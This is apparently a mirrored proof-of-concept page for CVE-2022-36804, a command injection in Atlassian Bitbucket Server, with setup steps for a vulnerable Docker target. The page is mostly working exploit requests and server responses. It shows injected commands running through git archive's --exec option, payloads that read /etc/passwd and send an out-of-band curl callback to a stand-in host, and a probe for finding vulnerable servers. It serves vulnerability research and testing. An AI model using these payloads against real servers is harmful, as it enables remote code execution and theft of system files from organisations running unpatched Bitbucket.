Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2022-36804 PoC — Atlassian Bitbucket Server 安全漏洞

Source
https://github.com/ColdFusionX/CVE-2022-36804
Associated Vulnerability
Title:Atlassian Bitbucket Server 安全漏洞 (CVE-2022-36804)
Description:Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.
Description
Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)
Readme
# CVE-2022-36804
Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)

> In affected versions of Atlassian Bitbucket Server and Data Center a Command Injection Vulnerability exists in multiple API endpoints where an attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.

### Vulnerable Target Setup

```shell
docker pull atlassian/bitbucket-server:7.2.5-ubuntu-jdk11

docker run -v /data/bitbucket:/var/atlassian/application-data/bitbucket --name="bitbucket" -d -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server:7.2.5-ubuntu-jdk11
```
- Create new PROJECT named `CFX` and a repository named `lord` and make it public, You can use any name for the project and repository.
- URL to list public repositories `Curl http://127.0.0.1:7990/rest/api/latest/repos`

### POC

#### REQUEST
```
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
```
#### RESPONSE
```
HTTP/1.1 500 
X-AREQUESTID: @1J1EWV1x490x54736x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: accept-encoding,x-auserid,cookie,x-ausername,accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 04 Oct 2022 08:10:56 GMT
Connection: close
Content-Length: 380

{"errors":[{"context":null,"message":"'/usr/bin/git archive --format=zip --prefix=fusion/\u0000--remote=/\u0000--exec=`id`\u0000--prefix=/ -- 49f16ce1e8ad32a360c9db7a3a84a0b72a12c51f bighax' exited with code 128 saying: `id` '/': 1: uid=2003(bitbucket): not found\nfatal: the remote end hung up unexpectedly","exceptionName":"com.atlassian.bitbucket.scm.CommandFailedException"}]}
```

### Additional Payloads

- Reading `/etc/passwd` 
```shell
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60cat%20/etc/passwd%60%00--prefix=/
```
- OOB Test, Replace `http://example.com` with Burp collab URL or NC listener
```shell
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=qualys/%00--remote=/%00--exec=curl%20http://example.com%00--prefix=/
```

#### Basic Check to find vulnerable server

REQUEST
```
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
```

RESPONSE
```
HTTP/1.1 200 
X-AREQUESTID: @1J1EWV1x506x54738x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: X-AUSERNAME
Vary: X-AUSERID
Vary: Cookie
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="lord-master@49f16ce1e8a.zip"; filename*=UTF-8''lord-master%4049f16ce1e8a.zip
Content-Type: application/octet-stream
Content-Length: 875
Date: Tue, 04 Oct 2022 08:26:21 GMT

usage: git archive [<options>] <tree-ish> [<path>...]
   or: git archive --list
   or: git archive --remote <repo> [--exec <cmd>] [<options>] <tree-ish> [<path>...]
   or: git archive --remote <repo> [--exec <cmd>] --list

    --format <fmt>        archive format
    --prefix <prefix>     prepend prefix to each pathname in the archive
    -o, --output <file>   write the archive to this file
    --worktree-attributes
                          read .gitattributes in working directory
    -v, --verbose         report archived files on stderr
    -0                    store only
    -1                    compress faster
    -9                    compress better

    -l, --list            list supported archive formats

    --remote <repo>       retrieve the archive from remote repository <repo>
    --exec <command>      path to the remote git-upload-archive command

```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →